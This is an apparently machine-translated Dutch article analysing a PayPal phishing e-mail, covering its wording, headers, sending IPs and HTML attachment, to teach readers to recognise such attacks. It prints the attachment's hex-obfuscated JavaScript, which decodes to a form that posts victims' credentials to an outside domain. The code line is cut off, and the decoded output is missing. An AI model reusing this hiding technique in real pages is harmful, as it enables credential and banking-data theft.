Online beveiliging De anatomie van een phishing-e-mail doorbreken
In de wereld van vandaag waar de informatie van iedereen online is, is phishing een van de meest populaire en verwoestende online aanvallen, omdat je altijd een virus kunt opruimen, maar als je bankgegevens worden gestolen, zit je in de problemen. Hier is een analyse van een dergelijke aanval die we hebben ontvangen.
Denk niet dat het alleen maar uw bankgegevens zijn die belangrijk zijn. Immers, als iemand de controle over uw accountaanmelding verkrijgt, weten zij niet alleen de informatie in dat account, maar de kans is groot dat dezelfde inloggegevens ook op andere accounts. En als ze uw e-mailaccount compromitteren, kunnen ze al uw andere wachtwoorden opnieuw instellen.
Dus naast het bijhouden van sterke en variërende wachtwoorden, moet je altijd op zoek naar valse e-mails die zich voordoen als het echte werk. Hoewel de meeste phishing-pogingen amateuristisch zijn, zijn sommige behoorlijk overtuigend, dus het is belangrijk om te begrijpen hoe ze op oppervlakteniveau kunnen worden herkend en hoe ze onder de motorkap werken.
Afbeelding door asirap
Onderzoeken wat er in zicht is
Onze voorbeeld-e-mail, zoals de meeste phishing-pogingen, "informeert" u over activiteit op uw PayPal-rekening die, onder normale omstandigheden, alarmerend zou zijn. De call-to-action is dus om uw account te verifiëren / herstellen door zo ongeveer elk stukje persoonlijke informatie in te dienen dat u maar kunt bedenken. Nogmaals, dit is een mooie formule.
Hoewel er zeker uitzonderingen zijn, wordt vrijwel elke phishing- en scam-e-mail rechtstreeks in het bericht met rode vlaggen geladen. Zelfs als de tekst overtuigend is, kun je meestal veel fouten vinden die door de hele berichttekst zijn verspreid, wat aangeeft dat het bericht niet legitiem is.
Het berichtteam
Op het eerste gezicht is dit een van de betere phishing-e-mails die ik heb gezien. Er zijn geen spelling- of grammaticale fouten en de woordenstroom is gebaseerd op wat u zou verwachten. Er zijn echter een paar rode vlaggen die u kunt zien als u de inhoud wat nauwkeuriger bekijkt.
- "Paypal" - De juiste casus is "PayPal" (hoofdletter P). U kunt zien dat beide varianten in het bericht worden gebruikt. Bedrijven zijn heel bewust met hun branding, dus het is twijfelachtig dat zoiets het proefproces zou doorstaan.
- "Allow ActiveX" - Hoe vaak hebt u een legitiem webbedrijf ter grootte van Paypal gezien dat een gepatenteerde component gebruikt die alleen in een enkele browser werkt, vooral wanneer deze meerdere browsers ondersteunen? Zeker, ergens daarbuiten doet een bedrijf het, maar dit is een rode vlag.
- "Veilig." - Let op hoe dit woord niet in de marge staat met de rest van de alineatekst. Zelfs als ik het venster wat meer uitrek, wordt het niet correct ingepakt of gespatieerd.
- "Paypal!" - De spatie vóór het uitroepteken ziet er vreemd uit. Gewoon een andere gril waarvan ik zeker weet dat die niet in een legitieme e-mail staat.
- "PayPal- Account Update Form.pdf.htm" - Waarom zou Paypal een "PDF" bijvoegen, vooral wanneer ze gewoon naar een pagina op hun site kunnen linken? Waarom zouden ze bovendien proberen een HTML-bestand als een PDF te verbergen? Dit is de grootste rode vlag van allemaal.
De berichtkop
Wanneer u de koptekst van het bericht bekijkt, verschijnen er een aantal meer rode vlaggen:
- Het van-adres is [email protected].
- Het aan adres ontbreekt. Ik heb dit niet weggelaten, het is gewoon geen onderdeel van de standaard berichtkop. Meestal zal een bedrijf dat uw naam heeft, de e-mail aan u persoonlijk maken.
De bijlage
Wanneer ik de bijlage open, kun je meteen zien dat de lay-out niet correct is omdat er stijlinformatie ontbreekt. Nogmaals, waarom zou PayPal een HTML-formulier e-mailen wanneer ze u gewoon een link op hun site kunnen geven?
Notitie: hiervoor hebben we de ingebouwde HTML-attachmentviewer van Gmail gebruikt, maar we raden je aan om GEEN bijlagen van oplichters te OPENEN. Nooit. Ooit. Ze bevatten vaak exploits die trojaanse paarden op je pc installeren om je accountgegevens te stelen.
Als u verder naar beneden scrolt, ziet u dat dit formulier niet alleen vraagt om onze PayPal-inloggegevens, maar ook om bank- en creditcardinformatie. Sommige afbeeldingen zijn verbroken.
Het is duidelijk dat deze phishing-poging met één klap op alles is gericht.
De technische verdeling
Hoewel het vrij duidelijk moet zijn op basis van wat in het volle zicht is dat dit een phishing-poging is, gaan we nu de technische samenstelling van de e-mail oplossen en zien wat we kunnen vinden.
Informatie uit de bijlage
Het eerste dat u moet bekijken, is de HTML-bron van het bijlageformulier dat de gegevens naar de nepsite stuurt.
Wanneer u de bron snel bekijkt, lijken alle links geldig als ze wijzen naar "paypal.com" of "paypalobjects.com" die beide legitiem zijn.
Nu gaan we enkele basispaginagegevens bekijken die Firefox verzamelt op de pagina.
Zoals je kunt zien, zijn sommige grafische afbeeldingen afkomstig van de domeinen "blessedtobe.com", "goodhealthpharmacy.com" en "pic-upload.de" in plaats van de legitieme PayPal-domeinen.
Informatie van de e-mailheaders
Vervolgens zullen we de rauwe headers van e-mailberichten bekijken. Gmail maakt dit beschikbaar via de menuoptie Show Original in het bericht.
Kijkend naar de koptekstinformatie voor het originele bericht, kunt u zien dat dit bericht is gecomponeerd met Outlook Express 6. Ik betwijfel of PayPal iemand heeft die deze berichten handmatig verzendt via een verouderde e-mailclient.
Als we nu kijken naar de routeringsinformatie, kunnen we het IP-adres zien van zowel de afzender als de relaying-mailserver.
Het IP-adres van de "Gebruiker" is de originele afzender. Als u snel naar de IP-informatie opzoekt, zien we dat het IP-adres in Duitsland is.
En als we kijken naar de relaying mail server's (mail.itak.at), IP-adres kunnen we zien dat dit een ISP is in Oostenrijk. Ik betwijfel of PayPal hun e-mails rechtstreeks door een in Oostenrijk gevestigde internetprovider stuurt wanneer ze een enorme serverfarm hebben die deze taak gemakkelijk aankan.
Waar gaan de gegevens naartoe??
We hebben dus duidelijk vastgesteld dat dit een phishing-e-mail is en hebben we informatie verzameld over waar het bericht vandaan is gekomen, maar hoe zit het met de verzending van uw gegevens??
Om dit te zien, moeten we eerst de HTM-bijlage opslaan op onze desktop en openen in een teksteditor. Als u er doorheen scrolt, lijkt alles op orde te zijn, behalve wanneer we een verdacht uitziend Javascript-blok bereiken.
Wanneer we de volledige bron van het laatste blok Javascript doorbreken, zien we:
// Auteursrecht © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; for (i = 0; i
Telkens wanneer u een grote warboel ziet met schijnbaar willekeurige letters en cijfers die zijn ingesloten in een Javascript-blok, is dit meestal verdacht. Als we naar de code kijken, wordt de variabele "x" ingesteld op deze grote reeks en vervolgens gedecodeerd in de variabele "y". Het eindresultaat van de variabele "y" wordt vervolgens naar het document geschreven als HTML.
Omdat de grote reeks bestaat uit de cijfers 0-9 en de letters a-f, is deze waarschijnlijk gecodeerd via een eenvoudige ASCII-naar-Hex-conversie:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Vertaald naar:
Het is geen toeval dat dit wordt omgezet in een geldige HTML-formuliertag die de resultaten niet naar PayPal verzendt, maar naar een frauduleuze site.
Wanneer u de HTML-bron van het formulier bekijkt, ziet u bovendien dat deze formuliertag niet zichtbaar is omdat deze dynamisch wordt gegenereerd via Javascript. Dit is een slimme manier om te verbergen wat de HTML feitelijk doet, als iemand eenvoudig de gegenereerde bron van de bijlage zou bekijken (zoals we eerder deden) in tegenstelling tot het openen van de bijlage rechtstreeks in een teksteditor.
Als u een snelle whois op de beledigende site uitvoert, kunnen we zien dat dit een domein is dat wordt gehost bij een populaire webhost, 1and1.
Wat opvalt is dat het domein een leesbare naam gebruikt (in tegenstelling tot iets als "dfh3sjhskjhw.net") en het domein is geregistreerd voor 4 jaar. Vanwege dit, geloof ik dat dit domein is gekaapt en gebruikt als een pion in deze phishing-poging.
Cynisme is een goede verdediging
Als het gaat om veilig online blijven, doet het nooit pijn om een goed beetje cynisme te hebben.
Hoewel ik er zeker van ben dat er meer rode vlaggetjes in het voorbeeld-e-mailbericht staan, zijn wat we hierboven hebben aangegeven indicatoren die we al na een paar minuten onderzoek zagen. Hypothetisch gezien, als de oppervlakte van de e-mail zijn legitieme tegenhanger 100% nabootste, zou de technische analyse nog steeds de ware aard ervan onthullen. Daarom is het belangrijk om te kunnen onderzoeken wat je wel en niet kunt zien.